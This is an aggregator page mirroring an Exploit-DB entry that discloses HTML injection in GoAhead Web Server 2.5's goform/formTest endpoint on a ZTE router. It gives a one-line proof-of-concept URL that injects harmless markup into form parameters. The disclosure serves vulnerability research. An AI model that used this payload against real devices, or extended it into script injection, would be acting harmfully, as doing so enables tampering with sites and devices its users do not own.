8

[webapps] GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vul...

 7 months ago
source link: https://www.exploit-db.com/exploits/51762
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities

EDB-ID:

51762

EDB Verified:

Platform:

Multiple

Date:

2024-01-31

Vulnerable App:

# Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities
# Date: 25/9/2023
# Exploit Author: Syed Affan Ahmed (ZEROXINN)
# Vendor Homepage: https://www.embedthis.com/goahead/
# Affected Version: 2.5 may be others.
# Tested On Version: 2.5 in ZTE AC3630

---------------------------POC---------------------------

GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation.

HTML Injection can cause the ability to execute within the context of that site.

http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1>

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK